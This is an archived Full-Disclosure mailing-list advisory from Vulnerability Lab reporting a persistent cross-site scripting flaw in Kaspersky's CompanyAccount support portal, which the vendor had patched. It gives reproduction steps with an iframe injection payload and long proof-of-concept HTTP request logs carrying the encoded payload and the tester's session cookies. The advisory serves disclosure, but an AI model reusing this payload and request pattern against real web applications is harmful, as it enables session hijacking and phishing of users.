lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 2 Sep 2016 15:28:46 +0200
From: Vulnerability Lab <research@...nerability-lab.com>
To: fulldisclosure@...lists.org
Subject: [FD] Kaspersky Company Account - Response XSS Vulnerability

Document Title:
===============
Kaspersky Company Account - Response XSS Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1934


Release Date:
=============
2016-08-29


Vulnerability Laboratory ID (VL-ID):
====================================
1934


Common Vulnerability Scoring System:
====================================
3.5


Product & Service Introduction:
===============================
Kaspersky CompanyAccount is a web service used for delivering and tracking user requests submitted to Kaspersky Lab. This system allows submitting requests to the 
Technical Support, VirusLab, and other departments. A CompanyAccount is created not for a single person but for a Company. All officers of that company are grouped 
into a single CompanyAccount by a license. This allows transferring CompanyAccount administration permissions from one officer to another with ease. A CompanyAccount 
administrator can review all the requests submitted by all the Company officers, create new user profiles, change passwords, and assign permissions. When a new user 
joins the CompanyAccount (self-registration), the administrator receives a notification hereof.

(Copy of the Vendor Homepage: http://support.kaspersky.com/faq/companyaccount_help#section0.block0 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an application-side input validation web vulnerability in the kaspersky company web-application.


Vulnerability Disclosure Timeline:
==================================
2016-08-28:	Vendor Fix/Patch (Kaspersky Security Department - APT)
2016-08-29:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Kaspersky Labs
Product: Company Account Application - (Web-Application) 2016 Q3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An application-side input validation vulnerability has been discovered in the official Kaspersky Company Account online service web-application.
The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the vulnerable web module or function.

Remote attackers are able to inject a persistent cross site scripting (xss) vulnerability malicious code in main function of the responding service.
The vulnerable module : `/arsys/forms/cssapp/SRS%3AServiceRequestConsole/` allows attackers to handle the subject of response request and to inject 
own malicious code in the subject field without secure parse. The request method to perform the malicious context request is GET and the attack vector 
is located on the application-side.

The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3. 
Exploitation of the persistent input validation web vulnerability requires a low privileged web-application user account and low or medium user interaction. 
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source 
and persistent manipulation of affected or connected application modules.

Vulnerable Request(s):
[+] GET 

Vulnerable Module(s):
[+] /arsys/BackChannel/

Vulnerable Parameter(s):
[+] param


Proof of Concept (PoC):
=======================
Persistent web vulnerability can be exploited by remote attackers with privileged web-application user account and low or medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. User moves to request which status "is on progress"
2. User add response to it by clicking on add response file
3. User injects script code payload (example: "><iframe src=http://vuln-lab.com>) into the subject summery input field
4. User submits the response and receives the execute response back
5. Successfully reproudce the issue !

PoC: Video 
https://youtu.be/qha-eDSrBjk


--- PoC Session Logs ---
GET /arsys/BackChannel/?param=265%2FGetEntryList%2F6%2Fcssapp12%2FSRM%3AWorkInfo13%2FRQC%20User%20View6%2Fcssapp14%2FSYS%3A
Menu%20Items0%2F94%2F1%5C1%5C4%5C1%5C1%5C7%5C2%5C6%5C1%5C4%5C1%5C1%5C1000000007%5C2%5C4%5C21%5CRequest%20Work%20Log%20Type%
5C4%5C1%5C1%5C1000004336%5C99%5C303449900%5C13%2F1%2F9%2F30344990029%2F1%2F24%2F2000%20General%20Information5%2F1%2F1%2F65%
2F1%2F1%2F01%2F01%2F21%2F715%2F1%2F10%2F1000000008 HTTP/1.1
Host: companyaccount.kaspersky.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://companyaccount.kaspersky.com/arsys/forms/cssapp/SRM%3AWorkInfo/RQC+User+View/?cacheid=d705f870&format=html
Cookie: G="fdc64813764a8e65:-357d1099:1569009c172:7172"; JSESSIONID=5483555C5EDA441BD5D6FC1A80EA32BD; MJUID=1400928406; _ga=GA1.2.666613717.1470861163; 
AMCV_983502BE532960BE0A490D4C%40AdobeOrg=-1785323188%7CMCMID%7C81653414455799023079073553614093424168%7CMCAID%7CNONE%7CMCAAMLH-1471650002%7C6%7CMCAAMB-
1471650002%7CNRX38WO0n5BH8Th-nqAG_A%7CMCIDTS%7C17026; s_fid=3152D780A6096225-0E15113962ECF62D; s_nr=1471377879296-Repeat; s_vi=[CS]v1|2BD6DBAC05313A6E-
6000010E0002ACDC[CE]; _ym_uid=1471003622538967996; _mkto_trk=id:802-IJN-240&token:_mch-kaspersky.com-1471003780041-45237; mmcore.tst=0.014; 
utag_main=v_id:01567ec9b1e3000a6ea5dcf19e820204200190090086e$_sn:1$_ss:0$_pn:26%3Bexp-session$_st:1471008541656$ses_id:1471005962723%3Bexp-session; 
__CT_Data_21=gpv=25&apv_21_www11=25&cpv_21_www11=25&rpv_21_www11=23; WRUID=570907575.2127180814; lae_vid=1006066330i2; ml_segment=NA-KASP-B2C-Acquisition-Store; 
fcP=C=0&T=1471006174291&DTO=1471006174280&U=1829232865&V=1471006328026; mmcore.com.tst=0.295; mmcore.de.tst=0.375; __CT_Data_77=gpv=2&apv_77_www11=2&cpv_77_www11=2&rpv_77_www11=2; 
__qca=P0-1273681643-1471045167943; tc_cj_v2=%5Ecl_%5Dny%5B%5D%5D_mmZZZZZZKNQKJNOLRSNKNZZZ%5D; reseller=de_passcheck_pro_ona_smm__onl_b2c__buttn____ktsmd_2016__; 
tc_trial_id=V12016813239340.6479560041838617; mbox=session#1471045174370-364099#1471047040|PC#1471045174370-364099.21_27#1472254782; __CT_Data_78=gpv=2&apv_78_www11=2&cpv_78_www11=2&
rpv_78_www11=2; mmapi.store.p.0=%7B%22mmparams.d%22%3A%7B%7D%2C%22mmparams.p%22%3A%7B%22uat%22%3A%221502542741285%7C%7B%5C%22BusinessSegment%5C%22%3A%5C%22Consumer%20Acquisition%5C
%22%2C%5C%22AfterTrial%5C%22%3A%5C%22Other%5C%22%2C%5C%22ConsumerAfter%5C%22%3A%5C%22%5C%22%2C%5C%22RetentionType%5C%22%3A%5C%22undefined%5C%22%2C%5C%22Referrer%5C%22%3A%5C%22%5C%22
%2C%5C%22ConsPaidSearch%5C%22%3A%5C%22%5C%22%2C%5C%22B2BPaidSearch%5C%22%3A%5C%22%5C%22%2C%5C%22RetailVendor%5C%22%3A%5C%22%5C%22%2C%5C%22DaystoExpirat%5C%22%3A%5C%22%5C%22%2C%5C%22
Expired%5C%22%3A%5C%22%5C%22%7D%22%2C%22mmid%22%3A%221502583256391%7C%5C%221671122440%7CPAAAAAqpXkyStw0AAA%3D%3D%5C%22%22%2C%22pd%22%3A%221502583256401%7C%5C%221599787834%7CPQAAAAoBQ
qleTJK3DcxMch0DAEDukMIOw9NIDwAAAKpN5ZyuwtNIAAAAAP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FAAZEaXJlY3QBtw0DAAAAAAAAAAAAAP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwAAAAAAAUU%3D%5C%22%22%2C%22
srv%22%3A%221502583256410%7C%5C%22ldnvwcgeu10%5C%22%22%7D%7D; ISAWPLB{CFDFFB6B-B0C6-498A-8E78-090021AAF221}={48409AB4-67F8-44B1-B55C-5F49C1FE393D}; P=1; st=3600; lt=60; 
cssapp=1469770616; GKW=%7B14%3A%7Bn%3A%22LASTID%22%2Ct%3A6%2Cv%3A%22QED000000878770%22%7D%2C15%3A%7Bn%3A%22LASTCOUNT%22%2Ct%3A7%2Cv%3A1%7D%7D; s_cc=true; 
s_sq=kasperskysupporten%3D%2526pid%253DCompany%252520Account%2526pidt%253D1%2526oid%253Djavascript%25253A%2526ot%253DA; T=3; wARRoot1471377685531=1; FC=1; w1471377886416D=1
Connection: keep-alive


GET /arsys/BackChannel/?param=756%2FSetEntryList%2F6%2Fcssapp12%2FSRM%3AWorkInfo6%2Fcssapp12%2FSRM%3AWorkInfo0%2F0%2F2%2F0%2F2%2F0%2F2%2F0%2F1%2F41%2F61%2F0309%2F31%2F1%2F71%2F83%2F1128%2F100001018%2F100018218%2F100018318%2F100018588%2F100019508%2F100019518%2F100019528%2F100019538%2F100
019548%2F100019628%2F100019638%2F100068008%2F100068039%2F3034499009%2F5368709139%2F5368709149%2F5368709159%2F5368709169%2F5368709179%2F5368709189%2F5368709199%2F5368709209%2F5368709219%2F5
368709229%2F5368709239%2F5368709249%2F5368709429%2F770002039246%2F31%2F3%2F1%2011%2Fx11%2F1000000047%3B13%2FHi%20read%20this%2030%2FSRHIZIRHDM0J5AO2A1FPDIY8AZ251X0%2F3%2F1%20119%2FGeneral%20Information0%2F3%2F1%2013%2F1%2010%2F10%2F147137799819%2Fzeroattck%40gmail.com34%2F%27%3E%3Ciframe%20src%3Dhttp%3A%2F%2Fvuln-lab.com%3E15%2FREQ0000066979179%2F2000%2020000%2F0%2F0%2F0%2F0%2F0%2F0%2F0%2F0%2F0%2F0%2F0%2F0%2F0%2F96%2F31%2F1%2F61%2F41%2F41%2F41%2F41%2F01%2F61%2F41%2F01%2F61%2F61%2F01%2F71%2F41%2F41%2F41%2F61
%2F01%2F01%2F01%2F01%2F01%2F01%2F01%2F01%2F01%2F01%2F01%2F01%2F01%2F01%2F01%2F02%2F0%2F HTTP/1.1
Host: companyaccount.kaspersky.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://companyaccount.kaspersky.com/arsys/forms/cssapp/SRM%3AWorkInfo/RQC+User+View/?cacheid=d705f870&format=html
Cookie: G="fdc64813764a8e65:-357d1099:1569009c172:7172"; JSESSIONID=5483555C5EDA441BD5D6FC1A80EA32BD; MJUID=1400928406; _ga=GA1.2.666613717.1470861163; 
AMCV_983502BE532960BE0A490D4C%40AdobeOrg=-1785323188%7CMCMID%7C81653414455799023079073553614093424168%7CMCAID%7CNONE%7CMCAAMLH-
1471650002%7C6%7CMCAAMB-1471650002%7CNRX38WO0n5BH8Th-nqAG_A%7CMCIDTS%7C17026; s_fid=3152D780A6096225-0E15113962ECF62D; s_nr=1471377879296-Repeat; 
s_vi=[CS]v1|2BD6DBAC05313A6E-6000010E0002ACDC[CE]; _ym_uid=1471003622538967996; _mkto_trk=id:802-IJN-240&token:_mch-kaspersky.com-1471003780041-45237; 
mmcore.tst=0.014; utag_main=v_id:01567ec9b1e3000a6ea5dcf19e820204200190090086e$_sn:1$_ss:0$_pn:26%3Bexp-session$_st:1471008541656$ses_id:1471005962723%3Bexp-session; 
__CT_Data_21=gpv=25&apv_21_www11=25&cpv_21_www11=25&rpv_21_www11=23; WRUID=570907575.2127180814; lae_vid=1006066330i2; ml_segment=NA-KASP-B2C-Acquisition-Store; 
fcP=C=0&T=1471006174291&DTO=1471006174280&U=1829232865&V=1471006328026; mmcore.com.tst=0.295; mmcore.de.tst=0.375; __CT_Data_77=gpv=2&apv_77_www11=2&cpv_77_www11=2&rpv_77_www11=2; 
__qca=P0-1273681643-1471045167943; tc_cj_v2=%5Ecl_%5Dny%5B%5D%5D_mmZZZZZZKNQKJNOLRSNKNZZZ%5D; reseller=de_passcheck_pro_ona_smm__onl_b2c__buttn____ktsmd_2016__; 
tc_trial_id=V12016813239340.6479560041838617; mbox=session#1471045174370-364099#1471047040|PC#1471045174370-364099.21_27#1472254782; 
__CT_Data_78=gpv=2&apv_78_www11=2&cpv_78_www11=2&rpv_78_www11=2; mmapi.store.p.0=%7B%22mmparams.d%22%3A%7B%7D%2C%22mmparams.p%22%3A%7B%22uat%22%3A%221502542741285%7C%7B%5C%22
BusinessSegment%5C%22%3A%5C%22Consumer%20Acquisition%5C%22%2C%5C%22AfterTrial%5C%22%3A%5C%22Other%5C%22%2C%5C%22ConsumerAfter%5C%22%3A%5C%22%5C%22%2C%5C%22RetentionType
%5C%22%3A%5C%22undefined%5C%22%2C%5C%22Referrer%5C%22%3A%5C%22%5C%22%2C%5C%22ConsPaidSearch%5C%22%3A%5C%22%5C%22%2C%5C%22B2BPaidSearch%5C%22%3A%5C%22%5C%22%2C%5C%22RetailVendor
%5C%22%3A%5C%22%5C%22%2C%5C%22DaystoExpirat%5C%22%3A%5C%22%5C%22%2C%5C%22Expired%5C%22%3A%5C%22%5C%22%7D%22%2C%22mmid%22%3A%221502583256391%7C%5C%221671122440%7CPAAAAAqpXkyStw0A
AA%3D%3D%5C%22%22%2C%22pd%22%3A%221502583256401%7C%5C%221599787834%7CPQAAAAoBQqleTJK3DcxMch0DAEDukMIOw9NIDwAAAKpN5ZyuwtNIAAAAAP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FAAZEaXJlY3QBtw0DAAAAA
AAAAAAAAP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwAAAAAAAUU%3D%5C%22%22%2C%22srv%22%3A%221502583256410%7C%5C%22ldnvwcgeu10%5C%22%22%7D%7D; 
ISAWPLB{CFDFFB6B-B0C6-498A-8E78-090021AAF221}={48409AB4-67F8-44B1-B55C-5F49C1FE393D}; P=1; st=3600; lt=60; cssapp=1469770616; 
GKW=%7B14%3A%7Bn%3A%22LASTID%22%2Ct%3A6%2Cv%3A%22QED000000878770%22%7D%2C15%3A%7Bn%3A%22LASTCOUNT%22%2Ct%3A7%2Cv%3A1%7D%7D; s_cc=true; 
s_sq=kasperskysupporten%3D%2526pid%253DCompany%252520Account%2526pidt%253D1%2526oid%253Djavascript%25253A%2526ot%253DA; T=3; wARRoot1471377685531=1; FC=1; w1471377886416D=1
Connection: keep-alive

 
GET /arsys/BackChannel/?param=276%2FGetTableEntryList%2F6%2Fcssapp25%2FSRS%3AServiceRequestConsole7%2Fenduser9%2F3013544006%2Fcssapp12%2FSRM%3AWorkInfo0%2F1%2F01%2F02%2F0%2F65%2F1%5C1%5C4%5C1%5C1%5C10001821%5C99%5C302808800%5C5%5C303471000%5C4%5C6%5C1%5C10001952%5C2%5C6%5C0%5C24
%2F2%2F9%2F3034710009%2F30280880038%2F2%2F1%2F%2030%2FSRHIZIRHDM0J5AO2A1FPDIY8AZ251X8%2F2%2F1%2F41%2F48%2F2%2F1%2F11%2F01%2F12%2F0%2F2%2F0%2F HTTP/1.1
Host: companyaccount.kaspersky.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://companyaccount.kaspersky.com/arsys/forms/cssapp/SRS%3AServiceRequestConsole/enduser/?cacheid=30a934dd
Cookie: G="fdc64813764a8e65:-357d1099:1569009c172:7172"; JSESSIONID=5483555C5EDA441BD5D6FC1A80EA32BD; MJUID=1400928406; _ga=GA1.2.666613717.1470861163; 
AMCV_983502BE532960BE0A490D4C%40AdobeOrg=-1785323188%7CMCMID%7C81653414455799023079073553614093424168%7CMCAID%7CNONE%7CMCAAMLH-
1471650002%7C6%7CMCAAMB-1471650002%7CNRX38WO0n5BH8Th-nqAG_A%7CMCIDTS%7C17026; s_fid=3152D780A6096225-0E15113962ECF62D; s_nr=1471377879296-Repeat; 
s_vi=[CS]v1|2BD6DBAC05313A6E-6000010E0002ACDC[CE]; _ym_uid=1471003622538967996; _mkto_trk=id:802-IJN-240&token:_mch-kaspersky.com-1471003780041-45237; 
mmcore.tst=0.014; utag_main=v_id:01567ec9b1e3000a6ea5dcf19e820204200190090086e$_sn:1$_ss:0$_pn:26%3Bexp-session$_st:1471008541656$ses_id:1471005962723%3Bexp-session; 
__CT_Data_21=gpv=25&apv_21_www11=25&cpv_21_www11=25&rpv_21_www11=23; WRUID=570907575.2127180814; lae_vid=1006066330i2; ml_segment=NA-KASP-B2C-Acquisition-Store; 
fcP=C=0&T=1471006174291&DTO=1471006174280&U=1829232865&V=1471006328026; mmcore.com.tst=0.295; mmcore.de.tst=0.375; 
__CT_Data_77=gpv=2&apv_77_www11=2&cpv_77_www11=2&rpv_77_www11=2; __qca=P0-1273681643-1471045167943; tc_cj_v2=%5Ecl_%5Dny%5B%5D%5D_mmZZZZZZKNQKJNOLRSNKNZZZ%5D; 
reseller=de_passcheck_pro_ona_smm__onl_b2c__buttn____ktsmd_2016__; tc_trial_id=V12016813239340.6479560041838617; 
mbox=session#1471045174370-364099#1471047040|PC#1471045174370-364099.21_27#1472254782; __CT_Data_78=gpv=2&apv_78_www11=2&cpv_78_www11=2&rpv_78_www11=2; 
mmapi.store.p.0=%7B%22mmparams.d%22%3A%7B%7D%2C%22mmparams.p%22%3A%7B%22uat%22%3A%221502542741285%7C%7B%5C%22BusinessSegment%5C%22%3A%5C%22Consumer%20Acquisition
%5C%22%2C%5C%22AfterTrial%5C%22%3A%5C%22Other%5C%22%2C%5C%22ConsumerAfter%5C%22%3A%5C%22%5C%22%2C%5C%22RetentionType%5C%22%3A%5C%22undefined%5C%22%2C%5C%22Referrer
%5C%22%3A%5C%22%5C%22%2C%5C%22ConsPaidSearch%5C%22%3A%5C%22%5C%22%2C%5C%22B2BPaidSearch%5C%22%3A%5C%22%5C%22%2C%5C%22RetailVendor%5C%22%3A%5C%22%5C%22%2C%5C%22DaystoExpirat
%5C%22%3A%5C%22%5C%22%2C%5C%22Expired%5C%22%3A%5C%22%5C%22%7D%22%2C%22mmid%22%3A%221502583256391%7C%5C%221671122440%7CPAAAAAqpXkyStw0AAA%3D%3D%5C%22%22%2C%22pd%22%3A%221502
583256401%7C%5C%221599787834%7CPQAAAAoBQqleTJK3DcxMch0DAEDukMIOw9NIDwAAAKpN5ZyuwtNIAAAAAP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FAAZEaXJlY3QBtw0DAAAAAAAAAAAAAP%2F%2F%2F%2F%2F%2F%2F
%2F%2F%2F%2F%2F%2F%2F%2FwAAAAAAAUU%3D%5C%22%22%2C%22srv%22%3A%221502583256410%7C%5C%22ldnvwcgeu10%5C%22%22%7D%7D; ISAWPLB{CFDFFB6B-B0C6-498A-8E78-090021AAF221}=
{48409AB4-67F8-44B1-B55C-5F49C1FE393D}; P=1; st=3600; lt=60; cssapp=1469770616; GKW=%7B14%3A%7Bn%3A%22LASTID%22%2Ct%3A6%2Cv%3A%22000000010195895%22%7D%2C15%3A%7Bn%3A%2
2LASTCOUNT%22%2Ct%3A7%2Cv%3A0%7D%7D; s_cc=true; s_sq=kasperskysupporten%3D%2526pid%253DCompany%252520Account%2526pidt%253D1%2526oid%253Djavascript%25253A%2526ot%253DA; 
T=2; wARRoot1471377685531=1; FC=1
Connection: keep-alive
If-Modified-Since: Tue, 16 Aug 2016 20:04:10 GMT
 

GET /arsys/BackChannel/?param=156%2FGetSQLEntryList%2F6%2Fcssapp61%2FSRS%3ASRC%3AWorkInfo_tbl_GetActivityDetails_100_
PopulateViewField1%2F21%2F21%2F32%2F0%2F2%2F0%2F2%2F0%2F13%2F1%2F9%2F53687091618%2F1%2F13%2FHi%20read%20this%205%2F1%2F1%2F41%2F0 HTTP/1.1
Host: companyaccount.kaspersky.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://companyaccount.kaspersky.com/arsys/forms/cssapp/SRS%3AServiceRequestConsole/enduser/?cacheid=30a934dd
Cookie: G="fdc64813764a8e65:-357d1099:1569009c172:7172"; JSESSIONID=5483555C5EDA441BD5D6FC1A80EA32BD; MJUID=1400928406; _ga=GA1.2.666613717.1470861163; 
AMCV_983502BE532960BE0A490D4C%40AdobeOrg=-1785323188%7CMCMID%7C81653414455799023079073553614093424168%7CMCAID%7CNONE%7CMCAAMLH-1471650002%7C6%7CMCAAMB-1471650002%7CNRX38WO0n5BH8Th-
nqAG_A%7CMCIDTS%7C17026; s_fid=3152D780A6096225-0E15113962ECF62D; s_nr=1471377879296-Repeat; s_vi=[CS]v1|2BD6DBAC05313A6E-6000010E0002ACDC[CE]; _ym_uid=1471003622538967996; 
_mkto_trk=id:802-IJN-240&token:_mch-kaspersky.com-1471003780041-45237; mmcore.tst=0.014; utag_main=v_id:01567ec9b1e3000a6ea5dcf19e820204200190090086e$_sn:1$_ss:0$_pn:26%3Bexp-session$_st:
1471008541656$ses_id:1471005962723%3Bexp-session; __CT_Data_21=gpv=25&apv_21_www11=25&cpv_21_www11=25&rpv_21_www11=23; WRUID=570907575.2127180814; lae_vid=1006066330i2; 
ml_segment=NA-KASP-B2C-Acquisition-Store; fcP=C=0&T=1471006174291&DTO=1471006174280&U=1829232865&V=1471006328026; mmcore.com.tst=0.295; mmcore.de.tst=0.375; 
__CT_Data_77=gpv=2&apv_77_www11=2&cpv_77_www11=2&rpv_77_www11=2; __qca=P0-1273681643-1471045167943; tc_cj_v2=%5Ecl_%5Dny%5B%5D%5D_mmZZZZZZKNQKJNOLRSNKNZZZ%5D; 
reseller=de_passcheck_pro_ona_smm__onl_b2c__buttn____ktsmd_2016__; tc_trial_id=V12016813239340.6479560041838617; mbox=session#1471045174370-364099#1471047040|
PC#1471045174370-364099.21_27#1472254782; __CT_Data_78=gpv=2&apv_78_www11=2&cpv_78_www11=2&rpv_78_www11=2; mmapi.store.p.0=%7B%22mmparams.d%22%3A%7B%7D%2C%22
mmparams.p%22%3A%7B%22uat%22%3A%221502542741285%7C%7B%5C%22BusinessSegment%5C%22%3A%5C%22Consumer%20Acquisition%5C%22%2C%5C%22AfterTrial%5C%22%3A%5C%22Other%5C%22%2C%5C%22
ConsumerAfter%5C%22%3A%5C%22%5C%22%2C%5C%22RetentionType%5C%22%3A%5C%22undefined%5C%22%2C%5C%22Referrer%5C%22%3A%5C%22%5C%22%2C%5C%22ConsPaidSearch%5C%22%3A%5C%22%5C%22%2C
%5C%22B2BPaidSearch%5C%22%3A%5C%22%5C%22%2C%5C%22RetailVendor%5C%22%3A%5C%22%5C%22%2C%5C%22DaystoExpirat%5C%22%3A%5C%22%5C%22%2C%5C%22Expired%5C%22%3A%5C%22%5C%22%7D%22%2C
%22mmid%22%3A%221502583256391%7C%5C%221671122440%7CPAAAAAqpXkyStw0AAA%3D%3D%5C%22%22%2C%22pd%22%3A%221502583256401%7C%5C%221599787834%7CPQAAAAoBQqleTJK3DcxMch0DAEDukMIOw9N
IDwAAAKpN5ZyuwtNIAAAAAP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FAAZEaXJlY3QBtw0DAAAAAAAAAAAAAP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwAAAAAAAUU%3D%5C%22%22%2C%22srv%22%3A%22150
2583256410%7C%5C%22ldnvwcgeu10%5C%22%22%7D%7D; ISAWPLB{CFDFFB6B-B0C6-498A-8E78-090021AAF221}={48409AB4-67F8-44B1-B55C-5F49C1FE393D}; P=1; st=3600; lt=60; cssapp=1469770616; 
GKW=%7B14%3A%7Bn%3A%22LASTID%22%2Ct%3A6%2Cv%3A%22000000010195895%22%7D%2C15%3A%7Bn%3A%22LASTCOUNT%22%2Ct%3A7%2Cv%3A2%7D%7D; s_cc=true; s_sq=kasperskysupporten%3D%2526pid%25
3DCompany%252520Account%2526pidt%253D1%2526oid%253Djavascript%25253A%2526ot%253DA; T=2; wARRoot1471377685531=1; FC=1
Connection: keep-alive


GET /arsys/BackChannel/?param=177%2FGetSQLEntryList%2F6%2Fcssapp61%2FSRS%3ASRC%3AWorkInfo_tbl_GetActivityDetails_100_PopulateViewField1%2F61%2F21%2F32%2F0%2F2%2F0%2F2%2F0
%2F13%2F1%2F9%2F30167350039%2F1%2F34%2F%27%3E%3Ciframe%20src%3Dhttp%3A%2F%2Fvuln-lab.com%3E5%2F1%2F1%2F41%2F0 HTTP/1.1
Host: companyaccount.kaspersky.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://companyaccount.kaspersky.com/arsys/forms/cssapp/SRS%3AServiceRequestConsole/enduser/?cacheid=30a934dd
Cookie: G="fdc64813764a8e65:-357d1099:1569009c172:7172"; JSESSIONID=5483555C5EDA441BD5D6FC1A80EA32BD; MJUID=1400928406; _ga=GA1.2.666613717.1470861163; 
AMCV_983502BE532960BE0A490D4C%40AdobeOrg=-1785323188%7CMCMID%7C81653414455799023079073553614093424168%7CMCAID%7CNONE%7CMCAAMLH-1471650002%7C6%7CMCAAMB-1471650002%7CNRX38WO0n5BH8Th-
nqAG_A%7CMCIDTS%7C17026; s_fid=3152D780A6096225-0E15113962ECF62D; s_nr=1471377879296-Repeat; s_vi=[CS]v1|2BD6DBAC05313A6E-6000010E0002ACDC[CE]; _ym_uid=1471003622538967996; 
_mkto_trk=id:802-IJN-240&token:_mch-kaspersky.com-1471003780041-45237; mmcore.tst=0.014; utag_main=v_id:01567ec9b1e3000a6ea5dcf19e820204200190090086e$_sn:1$_ss:
0$_pn:26%3Bexp-session$_st:1471008541656$ses_id:1471005962723%3Bexp-session; __CT_Data_21=gpv=25&apv_21_www11=25&cpv_21_www11=25&rpv_21_www11=23; WRUID=570907575.2127180814; 
lae_vid=1006066330i2; ml_segment=NA-KASP-B2C-Acquisition-Store; fcP=C=0&T=1471006174291&DTO=1471006174280&U=1829232865&V=1471006328026; mmcore.com.tst=0.295; 
mmcore.de.tst=0.375; __CT_Data_77=gpv=2&apv_77_www11=2&cpv_77_www11=2&rpv_77_www11=2; __qca=P0-1273681643-1471045167943; tc_cj_v2=%5Ecl_%5Dny%5B%5D%5D_mmZZZZZZKNQKJNOLRSNKNZZZ%5D; 
reseller=de_passcheck_pro_ona_smm__onl_b2c__buttn____ktsmd_2016__; tc_trial_id=V12016813239340.6479560041838617; mbox=session#1471045174370-364099#1471047040|PC#1471045174370-
364099.21_27#1472254782; __CT_Data_78=gpv=2&apv_78_www11=2&cpv_78_www11=2&rpv_78_www11=2; mmapi.store.p.0=%7B%22mmparams.d%22%3A%7B%7D%2C%22mmparams.p%22%3A%7B%22uat%22%3A%221
502542741285%7C%7B%5C%22BusinessSegment%5C%22%3A%5C%22Consumer%20Acquisition%5C%22%2C%5C%22AfterTrial%5C%22%3A%5C%22Other%5C%22%2C%5C%22ConsumerAfter%5C%22%3A%5C%22%5C%22%2C%5C
%22RetentionType%5C%22%3A%5C%22undefined%5C%22%2C%5C%22Referrer%5C%22%3A%5C%22%5C%22%2C%5C%22ConsPaidSearch%5C%22%3A%5C%22%5C%22%2C%5C%22B2BPaidSearch%5C%22%3A%5C%22%5C%22%2C%5
C%22RetailVendor%5C%22%3A%5C%22%5C%22%2C%5C%22DaystoExpirat%5C%22%3A%5C%22%5C%22%2C%5C%22Expired%5C%22%3A%5C%22%5C%22%7D%22%2C%22mmid%22%3A%221502583256391%7C%5C%221671122440%7
CPAAAAAqpXkyStw0AAA%3D%3D%5C%22%22%2C%22pd%22%3A%221502583256401%7C%5C%221599787834%7CPQAAAAoBQqleTJK3DcxMch0DAEDukMIOw9NIDwAAAKpN5ZyuwtNIAAAAAP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FAA
ZEaXJlY3QBtw0DAAAAAAAAAAAAAP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwAAAAAAAUU%3D%5C%22%22%2C%22srv%22%3A%221502583256410%7C%5C%22ldnvwcgeu10%5C%22%22%7D%7D; 
ISAWPLB{CFDFFB6B-B0C6-498A-8E78-090021AAF221}={48409AB4-67F8-44B1-B55C-5F49C1FE393D}; P=1; st=3600; lt=60; cssapp=1469770616; GKW=%7B14%3A%7Bn%3A%22LASTID%22%2Ct%3A6%2Cv%3A%220
00000010195895%22%7D%2C15%3A%7Bn%3A%22LASTCOUNT%22%2Ct%3A7%2Cv%3A1%7D%7D; s_cc=true; s_sq=kasperskysupporten%3D%2526pid%253DCompany%252520Account%2526pidt%253D1%2526oid%253D
javascript%25253A%2526ot%253DA; T=2; wARRoot1471377685531=1; FC=1
Connection: keep-alive


Solution - Fix & Patch:
=======================
2016-08-28:	Vendor Fix/Patch (Kaspersky Security Department - APT)


Security Risk:
==============
The security risk of the application-side input validation web vulnerability in the web-application is estimated as medium. (CVSS 3.5)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Lawrence Amer - ( http://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer )


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
